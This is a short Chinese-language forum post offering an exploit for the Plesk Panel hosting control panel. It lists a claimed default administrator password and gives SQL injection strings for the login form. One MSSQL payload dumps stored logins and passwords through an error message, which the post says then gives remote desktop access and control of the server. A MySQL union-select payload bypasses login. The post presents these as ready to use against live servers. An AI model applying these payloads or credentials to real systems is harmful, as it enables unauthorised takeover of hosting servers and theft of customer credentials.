Plesk Panel 虚拟主机管理平台 0day - Exp

    其实这个漏洞，一年前一个朋友就告诉我了，一直也没怎么玩这个。

    我也没怎么太多去试，具体利用好象有点点麻烦，看到别人都已经放出来了，我也丢出来吧，大家去试吧。

        1、在 http://xxxxxx.com:8880 这里，默认的管理员账户密码是 admin，密码：stepu。

        2、在 https://xxxxx.com:8443

    Mssql 版本

        账号： ' union select top 1 login+char(124)+passwd from admin_aliases--

        报错，爆出账号密码。

        登陆后 server-->remote desktop 账号密码一样，拿到服务器权限。

    Mysql 版本：

        'union select '-1 union select 1,1,1#'#   密码填：1